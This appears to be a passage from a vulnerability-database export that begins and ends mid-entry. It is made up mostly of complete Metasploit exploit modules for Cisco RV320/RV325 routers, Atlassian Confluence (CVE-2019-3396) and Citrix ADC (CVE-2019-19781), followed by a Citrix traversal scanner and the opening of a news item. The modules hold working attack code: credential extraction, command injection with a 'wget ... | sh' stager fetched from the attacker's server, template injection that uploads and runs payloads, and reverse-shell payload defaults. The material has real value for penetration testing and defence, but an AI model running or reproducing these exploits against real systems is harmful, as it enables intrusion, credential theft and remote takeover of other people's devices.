(We are limited to 50 chars for the initial command.)', '/']),\n OptInt.new('HTTPDELAY', [true, 'Time that the HTTP Server will wait for the payload request', 15]),\n OptBool.new('USE_SSL', [false, 'Negotiate SSL/TLS for outgoing connections', false]) # Don't use 'SSL' option to prevent HttpServer from picking this up.\n ])\n deregister_options('SSL') # prevent SSL in HttpServer and resulting payload requests since the injected wget command will not work with '--no-check-certificate' option.\n deregister_options('SSLCert') # not required since stager only uses HTTP.\n end\n\n def execute_command(cmd, opts = {})\n # use generated payload, we don't have to do anything here\n end\n\n def autofilter\n true\n end\n\n def on_request_uri(cli, req)\n print_status(\"#{peer} - Payload request received: #{req.uri}\")\n @cmdstager = generate_cmdstager().join(';')\n send_response(cli, \"#{@cmdstager}\")\n end\n\n def primer\n payload_url = get_uri\n print_status(\"Downloading configuration from #{peer}\")\n if(datastore['USE_SSL'])\n print_status(\"Using SSL connection to router.\")\n end\n res = send_request_cgi({\n 'uri' => normalize_uri(\"cgi-bin\",\"config.exp\"),\n 'SSL' => datastore['USE_SSL']\n })\n unless res\n vprint_error('Connection failed.')\n return nil\n end\n\n unless res.code == 200\n vprint_error('Could not download config. 
Aborting.')\n return nil\n end\n\n print_status(\"Successfully downloaded config\")\n username = res.body.match(/^USERNAME=([a-zA-Z]+)/)[1]\n pass = res.body.match(/^PASSWD=(\\h+)/)[1]\n authkey = \"1964300002\"\n print_status(\"Got MD5-Hash: #{pass}\")\n print_status(\"Logging in as user #{username} using password hash.\")\n print_status(\"Using default auth_key #{authkey}\")\n res2 = send_request_cgi({\n 'uri' => normalize_uri(\"cgi-bin\",\"userLogin.cgi\"),\n 'SSL' => datastore['USE_SSL'],\n 'method' => 'POST',\n 'data' => \"login=true&portalname=CommonPortal&password_expired=0&auth_key=#{authkey}&auth_server_pw=Y2lzY28%3D&submitStatus=0&pdStrength=1&username=#{username}&password=#{pass}&LanguageList=Deutsch&current_password=&new_password=&re_new_password=\"\n })\n\n # Check the login response (res2), not the earlier config download (res)\n unless res2\n vprint_error('Connection failed during login. Aborting.')\n return nil\n end\n\n unless res2.code == 200\n vprint_error('Login failed with downloaded credentials. Aborting.')\n return nil\n end\n\n #Extract authentication cookies\n cookies = res2.get_cookies()\n print_status(\"Successfully logged in as user #{username}.\")\n print_status(\"Got cookies: #{cookies}\")\n print_status(\"Sending payload. Staging via #{payload_url}.\")\n #Build staging command\n command_string = CGI::escape(\"'$(wget -q -O- #{payload_url}|sh)'\")\n if(command_string.length <= 63)\n print_status(\"Staging command length looks good. Sending exploit!\")\n else\n vprint_error(\"Warning: Staging command length probably too long. 
Trying anyway...\")\n end\n\n res3 = send_request_cgi({\n 'uri' => normalize_uri(\"certificate_handle2.htm\"),\n 'SSL' => datastore['USE_SSL'],\n 'method' => 'POST',\n 'cookie' => cookies,\n 'vars_get' => {\n 'type' => '4',\n },\n 'vars_post' => {\n 'page' => 'self_generator.htm',\n 'totalRules' => '1',\n 'OpenVPNRules' => '30',\n 'submitStatus' => '1',\n 'log_ch' => '1',\n 'type' => '4',\n 'Country' => 'A',\n 'state' => 'A',\n 'locality' => 'A',\n 'organization' => 'A',\n 'organization_unit' => 'A',\n 'email' => 'any@example.com',\n 'KeySize' => '512',\n 'KeyLength' => '1024',\n 'valid_days' => '30',\n 'SelectSubject_c' => '1',\n 'SelectSubject_s' => '1'\n },\n 'data' => \"common_name=#{command_string}\"\n })\n unless res3\n vprint_error('Connection failed while sending command. Aborting.')\n return nil\n end\n\n unless res3.code == 200\n vprint_error('Sending command not successful.')\n return nil\n end\n print_status(\"Sending payload timed out. Waiting for stager to connect...\")\n end\n\n def check\n #Check if device is vulnerable by downloading the config\n res = send_request_cgi({'uri'=>normalize_uri(\"cgi-bin\",\"config.exp\")})\n\n unless res\n vprint_error('Connection failed.')\n return CheckCode::Unknown\n end\n\n unless res.code == 200\n return CheckCode::Safe\n end\n\n unless res.body =~ /PASSWD/\n return CheckCode::Detected\n end\n\n CheckCode::Vulnerable\n end\n\n def exploit\n # Main function.\n # Setting delay for the Stager.\n Timeout.timeout(datastore['HTTPDELAY']) {super}\n rescue Timeout::Error\n print_status(\"Waiting for stager connection timed out. 
Try increasing the delay.\")\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/cisco_rv32x_rce.rb", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-07-12T17:14:01", "description": "The Widget Connector Macro is part of Atlassian Confluence Server and Data Center and allows embedding online videos, slideshows, photostreams and more directly into a page. Its _template parameter can be pointed at a remote Velocity template, so an attacker can inject a template containing Java code and gain code execution. Authentication is not required to exploit this vulnerability. By default a Java payload is used because it is cross-platform, but a native payload (Linux or Windows) can also be selected. Confluence before version 6.6.12, from version 6.7.0 before 6.12.3, from version 6.13.0 before 6.13.3 and from version 6.14.0 before 6.14.2 are affected. This vulnerability was originally discovered by Daniil Dmitriev https://twitter.com/ddv_ua.\n", "cvss3": {}, "published": "2019-04-11T12:55:51", "type": "metasploit", "title": "Atlassian Confluence Widget Connector Macro Velocity Template Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-3396"], "modified": "2022-07-01T12:43:47", "id": "MSF:EXPLOIT-MULTI-HTTP-CONFLUENCE_WIDGET_CONNECTOR-", "href": "https://www.rapid7.com/db/modules/exploit/multi/http/confluence_widget_connector/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Remote::FtpServer\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Atlassian Confluence Widget Connector Macro Velocity Template Injection',\n 'Description' => %q{\n Widget 
Connector Macro is part of Atlassian Confluence Server and Data Center and\n allows embedding online videos, slideshows, photostreams and more directly into a page.\n Its _template parameter can be pointed at a remote Velocity template, so an attacker can\n inject a template containing Java code and gain code execution. Authentication is not\n required to exploit this vulnerability. By default a Java payload is used because it is\n cross-platform, but a native payload (Linux or Windows) can also be selected.\n\n Confluence before version 6.6.12, from version 6.7.0 before 6.12.3, from version\n 6.13.0 before 6.13.3 and from version 6.14.0 before 6.14.2 are affected.\n\n This vulnerability was originally discovered by Daniil Dmitriev\n https://twitter.com/ddv_ua.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'Daniil Dmitriev', # Vulnerability discovery\n 'Dmitry (rrock) Shchannikov' # Metasploit module\n ],\n 'References' => [\n [ 'CVE', '2019-3396' ],\n [ 'URL', 'https://confluence.atlassian.com/doc/confluence-security-advisory-2019-03-20-966660264.html' ],\n [ 'URL', 'https://chybeta.github.io/2019/04/06/Analysis-for-%E3%80%90CVE-2019-3396%E3%80%91-SSTI-and-RCE-in-Confluence-Server-via-Widget-Connector/'],\n [ 'URL', 'https://paper.seebug.org/886/']\n ],\n 'Targets' => [\n [ 'Java', { 'Platform' => 'java', 'Arch' => ARCH_JAVA }],\n [ 'Windows', { 'Platform' => 'win', 'Arch' => ARCH_X86 }],\n [ 'Linux', { 'Platform' => 'linux', 'Arch' => ARCH_X86 }]\n ],\n 'DefaultOptions' => {\n 'RPORT' => 8090,\n 'SRVPORT' => 8021\n },\n 'Privileged' => false,\n 'DisclosureDate' => '2019-03-25',\n 'DefaultTarget' => 0,\n 'Stance' => Msf::Exploit::Stance::Aggressive,\n 'Notes' => {\n 'Stability' => [ CRASH_SAFE ],\n 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],\n 'Reliability' => [ REPEATABLE_SESSION ]\n }\n )\n )\n\n register_options(\n [\n OptAddress.new('SRVHOST', [true, 'Callback address for template loading']),\n OptString.new('TARGETURI', [true, 'The base path to Confluence', '/']),\n 
OptString.new('TRIGGERURL', [\n true, 'URL of an external video service used to trigger the vulnerability',\n 'https://www.youtube.com/watch?v=kxopViU98Xo'\n ])\n ]\n )\n end\n\n # Handles ftp RETR command: serves the Velocity template the target was told to fetch.\n #\n # @param ccs [Socket] Control connection socket.\n # @param arg [String] RETR argument.\n # @return [void]\n def on_client_command_retr(ccs, arg)\n vprint_status(\"FTP download request for #{arg}\")\n conn = establish_data_connection(ccs)\n if !conn\n ccs.put(\"425 Can't build data connection\\r\\n\")\n return\n end\n\n ccs.put(\"150 Opening BINARY mode data connection for #{arg}\\r\\n\")\n case arg\n when /check\\.vm$/\n conn.put(wrap(get_check_vm))\n when /javaprop\\.vm$/\n conn.put(wrap(get_javaprop_vm))\n when /upload\\.vm$/\n conn.put(wrap(get_upload_vm))\n when /exec\\.vm$/\n conn.put(wrap(get_exec_vm))\n else\n conn.put(wrap(get_dummy_vm))\n end\n ccs.put(\"226 Transfer complete.\\r\\n\")\n conn.close\n end\n\n # Handles ftp PASS command to suppress output.\n #\n # @param ccs [Socket] Control connection socket.\n # @param arg [String] PASS argument.\n # @return [void]\n def on_client_command_pass(ccs, arg)\n @state[ccs][:pass] = arg\n vprint_status(\"#{@state[ccs][:name]} LOGIN #{@state[ccs][:user]} / #{@state[ccs][:pass]}\")\n ccs.put \"230 Login OK\\r\\n\"\n end\n\n # Handles ftp EPSV command to suppress output.\n #\n # @param ccs [Socket] Control connection socket.\n # @param arg [String] EPSV argument.\n # @return [void]\n def on_client_command_epsv(ccs, arg)\n vprint_status(\"#{@state[ccs][:name]} UNKNOWN 'EPSV #{arg}'\")\n ccs.put(\"500 'EPSV #{arg}': command not understood.\\r\\n\")\n end\n\n # Returns the upload template (writes the base64-decoded payload to @fname on the target).\n #\n # @return [String]\n def get_upload_vm\n <<~EOF\n $i18n.getClass().forName('java.io.FileOutputStream').getConstructor($i18n.getClass().forName('java.lang.String')).newInstance('#{@fname}').write($i18n.getClass().forName('sun.misc.BASE64Decoder').getConstructor(null).newInstance(null).decodeBuffer('#{@b64}'))\n EOF\n end\n\n # 
Returns a command execution template.\n #\n # @return [String]\n def get_exec_vm\n <<~EOF\n $i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime', null).invoke(null, null).exec('#{@command}').waitFor()\n EOF\n end\n\n # Returns checking template.\n #\n # @return [String]\n def get_check_vm\n <<~EOF\n #{@check_text}\n EOF\n end\n\n # Returns Java's getting property template.\n #\n # @return [String]\n def get_javaprop_vm\n <<~EOF\n $i18n.getClass().forName('java.lang.System').getMethod('getProperty', $i18n.getClass().forName('java.lang.String')).invoke(null, '#{@prop}').toString()\n EOF\n end\n\n # Returns dummy template.\n #\n # @return [String]\n def get_dummy_vm\n <<~EOF\n EOF\n end\n\n # Checks the vulnerability.\n #\n # @return [Array] Check code\n def check\n checkcode = Exploit::CheckCode::Safe\n begin\n # Start the FTP service\n print_status('Starting the FTP server.')\n start_service\n\n @check_text = Rex::Text.rand_text_alpha(5..10)\n res = inject_template(\"ftp://#{srvhost}:#{srvport}/#{Rex::Text.rand_text_alpha(5)}check.vm\")\n if res && res.body && res.body.include?(@check_text)\n checkcode = Exploit::CheckCode::Vulnerable\n end\n rescue Msf::Exploit::Failed => e\n vprint_error(e.message)\n checkcode = Exploit::CheckCode::Unknown\n end\n checkcode\n end\n\n # Injects Java code to the template.\n #\n # @param service_url [String] Address of template to injection.\n # @return [void]\n def inject_template(service_url, timeout = 20)\n uri = normalize_uri(target_uri.path, 'rest', 'tinymce', '1', 'macro', 'preview')\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => uri,\n 'headers' => {\n 'Accept' => '*/*',\n 'Origin' => full_uri(vhost_uri: true)\n },\n 'ctype' => 'application/json; charset=UTF-8',\n 'data' => {\n 'contentId' => '1',\n 'macro' => {\n 'name' => 'widget',\n 'body' => '',\n 'params' => {\n 'url' => datastore['TRIGGERURL'],\n '_template' => service_url\n }\n\n }\n }.to_json\n }, timeout)\n\n unless res\n unless 
service_url.include?('exec.vm')\n print_warning('Connection timed out in #inject_template')\n end\n return\n end\n\n if res.body.include? 'widget-error'\n print_error('Failed to inject and execute code:')\n else\n vprint_status('Server response:')\n end\n\n vprint_line(res.body)\n\n res\n end\n\n # Returns a system property for Java.\n #\n # @param prop [String] Name of the property to retrieve.\n # @return [Array] Array consisting of a result code (Integer) and, if the property could be obtained, the property (String).\n def get_java_property(prop)\n @prop = prop\n res = inject_template(\"ftp://#{srvhost}:#{srvport}/#{Rex::Text.rand_text_alpha(5)}javaprop.vm\")\n if res && res.body\n if res.body.empty?\n return [2]\n else\n prop_to_return = clear_response(res.body)\n if prop_to_return.blank?\n return [2]\n else\n return [0, prop_to_return]\n end\n end\n end\n [1]\n end\n\n # Returns the target platform.\n #\n # @return [String]\n def get_target_platform\n return get_java_property('os.name')\n end\n\n # Checks if the target os/platform is compatible with the module target or not.\n #\n # @return [TrueClass] Compatible\n # @return [FalseClass] Not compatible\n def target_platform_compat?(target_platform)\n target.platform.names.each do |n|\n if n.downcase == 'java' || target_platform.downcase.include?(n.downcase)\n return true\n end\n end\n\n false\n end\n\n # Returns a temp path from the remote target.\n #\n # @return [String]\n def get_tmp_path\n return get_java_property('java.io.tmpdir')\n end\n\n # Returns the Java home path used by Confluence.\n #\n # @return [String]\n def get_java_home_path\n return get_java_property('java.home')\n end\n\n # Returns Java code that can be used to inject to the template in order to copy a file.\n #\n # @note The purpose of this method is to have a file that is not busy, so we can execute it.\n # It is meant to be used with #get_write_file_code.\n #\n # @param fname [String] The file to copy\n # @param new_fname [String] The new 
file\n # @return [void]\n def get_dup_file_code(fname, new_fname)\n if fname =~ %r{^/[[:print:]]+}\n @command = \"cp #{fname} #{new_fname}\"\n else\n @command = \"cmd.exe /C copy #{fname} #{new_fname}\"\n end\n\n inject_template(\"ftp://#{srvhost}:#{srvport}/#{Rex::Text.rand_text_alpha(5)}exec.vm\")\n end\n\n # Returns the normalized file path for payload.\n #\n # @return [String]\n def normalize_payload_fname(tmp_path, fname)\n # A quick way to check platform instead of actually grabbing os.name in Java system properties.\n if tmp_path =~ %r{^/[[:print:]]+}\n Rex::FileUtils.normalize_unix_path(tmp_path, fname)\n else\n Rex::FileUtils.normalize_win_path(tmp_path, fname)\n end\n end\n\n # Exploits the target in Java platform.\n #\n # @return [void]\n def exploit_as_java\n res_code, tmp_path = get_tmp_path\n\n unless res_code == 0\n fail_with(Failure::Unknown, 'Unable to get the temp path.')\n end\n\n @fname = normalize_payload_fname(tmp_path, \"#{Rex::Text.rand_text_alpha(5)}.jar\")\n @b64 = Rex::Text.encode_base64(payload.encoded_jar)\n @command = ''\n\n res_code, java_home = get_java_home_path\n\n if res_code == 0\n vprint_status(\"Found Java home path: #{java_home}\")\n else\n fail_with(Failure::Unknown, 'Unable to find java home path on the remote machine.')\n end\n\n register_files_for_cleanup(@fname)\n\n if @fname =~ %r{^/[[:print:]]+}\n normalized_java_path = Rex::FileUtils.normalize_unix_path(java_home, '/bin/java')\n @command = %(#{normalized_java_path} -jar #{@fname})\n else\n normalized_java_path = Rex::FileUtils.normalize_win_path(java_home, '\\\\bin\\\\java.exe')\n @fname.gsub!(/Program Files/, 'PROGRA~1')\n @command = %(cmd.exe /C \"#{normalized_java_path}\" -jar #{@fname})\n end\n\n print_status(\"Attempting to upload #{@fname}\")\n inject_template(\"ftp://#{srvhost}:#{srvport}/#{Rex::Text.rand_text_alpha(5)}upload.vm\")\n\n print_status(\"Attempting to execute #{@fname}\")\n 
inject_template(\"ftp://#{srvhost}:#{srvport}/#{Rex::Text.rand_text_alpha(5)}exec.vm\", 5)\n end\n\n # Exploits the target in Windows platform.\n #\n # @return [void]\n def exploit_as_windows\n res_code, tmp_path = get_tmp_path\n\n unless res_code == 0\n fail_with(Failure::Unknown, 'Unable to get the temp path.')\n end\n\n @b64 = Rex::Text.encode_base64(generate_payload_exe(code: payload.encoded, arch: target.arch, platform: target.platform))\n @fname = normalize_payload_fname(tmp_path, \"#{Rex::Text.rand_text_alpha(5)}.exe\")\n new_fname = normalize_payload_fname(tmp_path, \"#{Rex::Text.rand_text_alpha(5)}.exe\")\n @fname.gsub!(/Program Files/, 'PROGRA~1')\n new_fname.gsub!(/Program Files/, 'PROGRA~1')\n register_files_for_cleanup(@fname, new_fname)\n\n print_status(\"Attempting to upload #{@fname}\")\n inject_template(\"ftp://#{srvhost}:#{srvport}/#{Rex::Text.rand_text_alpha(5)}upload.vm\")\n\n print_status(\"Attempting to copy payload to #{new_fname}\")\n get_dup_file_code(@fname, new_fname)\n\n print_status(\"Attempting to execute #{new_fname}\")\n @command = new_fname\n inject_template(\"ftp://#{srvhost}:#{srvport}/#{Rex::Text.rand_text_alpha(5)}exec.vm\", 5)\n end\n\n # Exploits the target in Linux platform.\n #\n # @return [void]\n def exploit_as_linux\n res_code, tmp_path = get_tmp_path\n\n unless res_code == 0\n fail_with(Failure::Unknown, 'Unable to get the temp path.')\n end\n\n @b64 = Rex::Text.encode_base64(generate_payload_exe(code: payload.encoded, arch: target.arch, platform: target.platform))\n @fname = normalize_payload_fname(tmp_path, Rex::Text.rand_text_alpha(5))\n new_fname = normalize_payload_fname(tmp_path, Rex::Text.rand_text_alpha(6))\n register_files_for_cleanup(@fname, new_fname)\n\n print_status(\"Attempting to upload #{@fname}\")\n inject_template(\"ftp://#{srvhost}:#{srvport}/#{Rex::Text.rand_text_alpha(5)}upload.vm\")\n\n @command = \"chmod +x #{@fname}\"\n 
inject_template(\"ftp://#{srvhost}:#{srvport}/#{Rex::Text.rand_text_alpha(5)}exec.vm\")\n\n print_status(\"Attempting to copy payload to #{new_fname}\")\n get_dup_file_code(@fname, new_fname)\n\n print_status(\"Attempting to execute #{new_fname}\")\n @command = new_fname\n inject_template(\"ftp://#{srvhost}:#{srvport}/#{Rex::Text.rand_text_alpha(5)}exec.vm\", 5)\n end\n\n def exploit\n @wrap_marker = Rex::Text.rand_text_alpha(5..10)\n\n # Start the FTP service\n print_status('Starting the FTP server.')\n start_service\n\n res_code, target_platform = get_target_platform\n case res_code\n when 0\n print_status(\"Target being detected as: #{target_platform}\")\n when 1\n fail_with(Failure::Unreachable, 'Target did not respond to OS check. Confirm RHOSTS and RPORT, then run \"check\".')\n when 2\n fail_with(Failure::NoTarget, 'Failed to obtain the target OS.')\n end\n\n unless target_platform_compat?(target_platform)\n fail_with(Failure::BadConfig, 'Selected module target does not match the actual target.')\n end\n\n case target.name.downcase\n when /java$/\n exploit_as_java\n when /windows$/\n exploit_as_windows\n when /linux$/\n exploit_as_linux\n end\n end\n\n # Wraps request.\n #\n # @return [String]\n def wrap(string)\n \"#{@wrap_marker}\\n#{string}#{@wrap_marker}\\n\"\n end\n\n # Returns unwrapped response.\n #\n # @return [String, nil]\n def clear_response(string)\n string.scan(/#{@wrap_marker}\\n(.*)\\n#{@wrap_marker}\\n/m)&.flatten&.first\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/confluence_widget_connector.rb", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-06-24T08:41:59", "description": "This module exploits a directory traversal in Citrix Application Delivery Controller (ADC), aka NetScaler, and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0, to execute an arbitrary command payload.\n", "cvss3": {}, "published": "2021-04-16T00:13:25", "type": "metasploit", "title": "Citrix 
ADC (NetScaler) Directory Traversal RCE", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-19781"], "modified": "2021-04-16T00:13:25", "id": "MSF:EXPLOIT-FREEBSD-HTTP-CITRIX_DIR_TRAVERSAL_RCE-", "href": "https://www.rapid7.com/db/modules/exploit/freebsd/http/citrix_dir_traversal_rce/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Remote::CheckModule\n include Msf::Exploit::FileDropper\n include Msf::Module::Deprecated\n\n moved_from 'exploit/linux/http/citrix_dir_traversal_rce'\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Citrix ADC (NetScaler) Directory Traversal RCE',\n 'Description' => %q{\n This module exploits a directory traversal in Citrix Application Delivery Controller (ADC), aka\n NetScaler, and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0, to execute an arbitrary command payload.\n },\n 'Author' => [\n 'Mikhail Klyuchnikov', # Discovery\n 'Project Zero India', # PoC used by this module\n 'TrustedSec', # PoC used by this module\n 'James Brytan', # PoC contributed independently\n 'James Smith', # PoC contributed independently\n 'Marisa Mack', # PoC contributed independently\n 'Rob Vinson', # PoC contributed independently\n 'Sergey Pashevkin', # PoC contributed independently\n 'Steven Laura', # PoC contributed independently\n 'mekhalleh (RAMELLA S\u00e9bastien)' # Module author (https://www.pirates.re/)\n ],\n 'References' => [\n ['CVE', '2019-19781'],\n ['EDB', '47901'],\n ['EDB', '47902'],\n ['URL', 'https://support.citrix.com/article/CTX267027/'],\n ['URL', 'https://www.mdsec.co.uk/2020/01/deep-dive-to-citrix-adc-remote-code-execution-cve-2019-19781/'],\n ['URL', 
'https://swarm.ptsecurity.com/remote-code-execution-in-citrix-adc/']\n ],\n 'DisclosureDate' => '2019-12-17',\n 'License' => MSF_LICENSE,\n 'Platform' => ['python', 'unix'],\n 'Arch' => [ARCH_PYTHON, ARCH_CMD],\n 'Privileged' => false,\n 'Targets' => [\n ['Python',\n 'Platform' => 'python',\n 'Arch' => ARCH_PYTHON,\n 'Type' => :python,\n 'DefaultOptions' => {'PAYLOAD' => 'python/meterpreter/reverse_tcp'}\n ],\n ['Unix Command',\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :unix_cmd,\n 'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_perl'}\n ]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'CheckModule' => 'auxiliary/scanner/http/citrix_dir_traversal',\n 'HttpClientTimeout' => 3.5\n },\n 'Notes' => {\n 'AKA' => ['Shitrix'],\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n ))\n\n register_options([\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n end\n\n def cmd_unix_generic?\n datastore['PAYLOAD'] == 'cmd/unix/generic'\n end\n\n def exploit\n print_status(\"Yeeting #{datastore['PAYLOAD']} payload at #{peer}\")\n vprint_status(\"Generated payload: #{payload.encoded}\")\n\n case target['Type']\n when :python\n execute_command(%(/var/python/bin/python2 -c \"#{payload.encoded}\"))\n when :unix_cmd\n if (res = execute_command(payload.encoded)) && cmd_unix_generic?\n print_line(res.get_html_document.text.gsub(/undef error - Attempt to bless.*/m, ''))\n end\n end\n end\n\n def execute_command(cmd, _opts = {})\n filename = rand_text_alpha(8..42)\n nonce = rand_text_alpha(8..42)\n\n # Stage 1: the traversal in NSC_USER makes newbm.pl write the bookmark file into the\n # portal templates directory; the title carries the Template Toolkit injection.\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/vpn/../vpns/portal/scripts/newbm.pl'),\n 'headers' => {\n 'NSC_USER' => \"../../../netscaler/portal/templates/#{filename}\",\n 'NSC_NONCE' => nonce\n },\n 'vars_post' => {\n 'url' => rand_text_alpha(8..42),\n 'title' => \"[%template.new({'BLOCK'='print readpipe(#{chr_payload(cmd)})'})%]\"\n 
}\n )\n\n unless res && res.code == 200\n print_error('No response to POST newbm.pl request')\n return\n end\n\n # Stage 2: request the written template so the Template Toolkit engine renders it and runs the command.\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, \"/vpn/../vpns/portal/#{filename}.xml\"),\n 'headers' => {\n 'NSC_USER' => rand_text_alpha(8..42),\n 'NSC_NONCE' => nonce\n },\n 'partial' => true\n )\n\n unless res && res.code == 200\n print_warning(\"No response to GET #{filename}.xml request\")\n end\n\n register_files_for_cleanup(\n \"/netscaler/portal/templates/#{filename}.xml\",\n \"/var/tmp/netscaler/portal/templates/#{filename}.xml.ttc2\"\n )\n\n res\n end\n\n def chr_payload(cmd)\n cmd.each_char.map { |c| \"chr(#{c.ord})\" }.join('.')\n end\n\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/freebsd/http/citrix_dir_traversal_rce.rb", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-06-24T08:41:59", "description": "This module exploits a directory traversal vulnerability (CVE-2019-19781) within Citrix ADC (NetScaler). It requests the smb.conf file located in the /vpns/cfg directory by issuing the request /vpn/../vpns/cfg/smb.conf. 
It then checks if the server is vulnerable by looking for the presence of a \"[global]\" directive in smb.conf, which this file should always contain.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-01-13T22:39:05", "type": "metasploit", "title": "Citrix ADC (NetScaler) Directory Traversal Scanner", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2022-02-16T23:22:40", "id": "MSF:AUXILIARY-SCANNER-HTTP-CITRIX_DIR_TRAVERSAL-", "href": "https://www.rapid7.com/db/modules/auxiliary/scanner/http/citrix_dir_traversal/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Scanner\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Citrix ADC (NetScaler) Directory Traversal Scanner',\n 'Description' => %{\n This module exploits a directory traversal vulnerability (CVE-2019-19781) within Citrix ADC\n 
(NetScaler). It requests the smb.conf file located in the /vpns/cfg directory by issuing the request\n /vpn/../vpns/cfg/smb.conf. It then checks if the server is vulnerable by looking for the presence of\n a \"[global]\" directive in smb.conf, which this file should always contain.\n },\n 'Author' => [\n 'Mikhail Klyuchnikov', # Discovery\n 'Erik Wynter', # Module (@wyntererik)\n 'altonjx' # Module (@altonjx)\n ],\n 'References' => [\n ['CVE', '2019-19781'],\n ['URL', 'https://web.archive.org/web/20200111095223/https://support.citrix.com/article/CTX267027/'],\n ['URL', 'https://swarm.ptsecurity.com/remote-code-execution-in-citrix-adc/']\n ],\n 'DisclosureDate' => '2019-12-17',\n 'License' => MSF_LICENSE,\n 'Notes' => {\n 'AKA' => ['Shitrix']\n }\n ))\n\n register_options([\n OptString.new('TARGETURI', [true, 'Base path', '/']),\n OptString.new('PATH', [true, 'Traversal path', '/vpn/../vpns/cfg/smb.conf'])\n ])\n end\n\n def run_host(target_host)\n turi = normalize_uri(target_uri.path, datastore['PATH'])\n\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => turi\n )\n\n unless res\n print_error(\"#{full_uri(turi)} - No response, target seems down.\")\n\n return Exploit::CheckCode::Unknown\n end\n\n unless res.code == 200\n print_error(\"#{full_uri(turi)} - The target is not vulnerable to CVE-2019-19781.\")\n vprint_error(\"Obtained HTTP response code #{res.code} for #{full_uri(turi)}.\")\n\n return Exploit::CheckCode::Safe\n end\n\n if turi.end_with?('smb.conf')\n unless res.headers['Content-Type'].starts_with?('text/plain') && res.body.match(/\\[\\s*global\\s*\\]/)\n vprint_warning(\"#{turi} does not contain \\\"[global]\\\" directive.\")\n end\n end\n\n print_good(\"#{full_uri(turi)} - The target is vulnerable to CVE-2019-19781.\")\n msg = \"Obtained HTTP response code #{res.code} for #{full_uri(turi)}. 
\" \\\n \"This means that access to #{turi} was obtained via directory traversal.\"\n vprint_good(msg)\n\n report_vuln(\n host: target_host,\n name: name,\n refs: references,\n info: msg\n )\n\n Exploit::CheckCode::Vulnerable\n end\n\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/http/citrix_dir_traversal.rb", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "thn": [{"lastseen": "2022-05-09T12:40:02", "description": "[](<https://thehackernews.com/images/-XOZnlffGMP8/XE7nbFKrD-I/AAAAAAAAzKw/AdK-1PkPXhYWGCDD3VJTTez6LvgSa1uuACLcBGAs/s728-e100/hacking-cisco-routers.jpg>)\n\nIf the connectivity and security of your organization rely on Cisco RV320 or RV325 Dual Gigabit WAN VPN routers, then you need to immediately install the latest firmware update released by the vendor last week. \n \nCyber attackers have actively been exploiting two newly patched high-severity router vulnerabilities in the wild after a security researcher released their [proof-of-concept exploit](<https://github.com/0x27/CiscoRV320Dump>) code on the Internet last weekend. \n \nThe vulnerabilities in question are a command injection flaw 